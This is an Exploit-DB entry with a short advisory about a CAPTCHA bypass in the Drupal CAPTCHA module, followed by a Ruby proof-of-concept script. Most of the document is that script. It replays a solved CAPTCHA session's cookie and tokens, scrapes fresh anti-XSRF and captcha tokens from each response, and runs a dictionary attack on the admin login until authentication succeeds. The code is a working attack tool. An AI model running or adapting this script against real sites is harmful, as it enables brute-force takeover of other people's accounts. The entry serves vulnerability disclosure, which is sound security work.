Drupal Module CAPTCHA - Security Bypass

EDB-ID:

35335

CVE:

N/A




Platform:

PHP

Date:

2011-02-11


source: https://www.securityfocus.com/bid/46344/info

The CAPTCHA module for Drupal is prone to a security-bypass vulnerability that occurs in the CAPTCHA authentication routine.

Successful exploits may allow attackers to bypass the CAPTCHA-based authentication routine, allowing attackers to perform brute-force attacks. 

# Drupal Captcha bruteforcing bypass

# This is a Proof Of Concept to demonstrate a logic security flow
# in the way drupal captcha is used to protect login forms
# from bruteforce. If the captcha challenge is solved, the next
# login attempts can be issued without solving any new captcha challenge.

# Usage: change URL, PATH, USERAGENT as you need.
# Change cookie, captcha_sid, captcha_token, form_build_id with the values
# you got in the html response AFTER the captcha is solved. This is needed
# in order to issue the first request as valid.
# Unique tokens will be then updated automatically .


# author: Michele "antisnatchor" Orru'

require "net/http"
require "net/https"
require "erb"
require "singleton"
require "rubygems"
require "nokogiri"


URL = 'antisnatchor.com'
PATH = '/user'
USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'

# easy to enhance this reading list from a file, but this is just a PoC
USERNAME_LIST = ['admin']
PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']

# these are the session values needed to create valid http requests, after
# the reCaptcha has been solved the first time, leaving the login form
# without a new captcha challenge
cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
captcha_sid = "476"
form_id = "user_login"


# these anti-XSRF tokens will change for every http response,
# so nokogiri is used to parse the html response in order to create
# the next http request with the valid anti-xsrf/captcha tokens.
# These initial values will be changed accordingly and automatically
# for each request .

captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"

authenticated = false;


    @http = Net::HTTP.new(URL, 80)
    @http.use_ssl = false

     puts "+Initial xsrf token [" + form_build_id + "]"
     puts "+Initial captcha token [" + captcha_token + "]"
     puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
     # I'm learning ruby :-)
     passwd_counter = 0

     while !authenticated && passwd_counter < PASSWD_LIST.size do
       puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"

       post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
                   "&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
                   "&captcha_token=" + captcha_token + "&op=Log+in"
      @headers = {
        'Cookie' => cookie,
        'Referer' => 'http://' + URL + PATH,
        'Content-Type' => 'application/x-www-form-urlencoded',
        'User-Agent' => USERAGENT
      }

      puts "+Request headers = " + @headers.inspect

      resp, data = @http.post2(PATH, post_data, @headers)

      # loads the response in nokogiri to parse anti-XSRF tokens
      doc = Nokogiri::HTML(data)
      puts '+Code = ' + resp.code
      puts '+Message = ' + resp.message


      # "debug" code
      #puts "=================================================== raw response START ======================================================="
      #puts data
      #puts "=================================================== raw response END ======================================================="

      if data.index("CAPTCHA session reuse attack detected") != nil
        puts "Doh', we've been detected by Drupal...quitting now"
        break
      end

      if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
        # if credentials will be valid, there will be a 302 response with
        # a new location header, corresponding to the user home page (http://antisnatchor.com/user/1 for instance)
        authenticated = true
      else
        #parse the anti-xsrf and captcha tokens from the response
        doc.css('input[id^=form]').each do |form_build_id|
          form_build_id = form_build_id['id']
          puts "+New xsrf token [" + form_build_id + "]"
        end

        doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
          captcha_token = captcha_token_id['value']
          puts "+New captcha token [" + captcha_token + "]"
        end

        # I'm still learning ruby :-)
        passwd_counter = passwd_counter + 1;

      end
      break if authenticated == true
     end

if authenticated
  puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
else
  puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."
end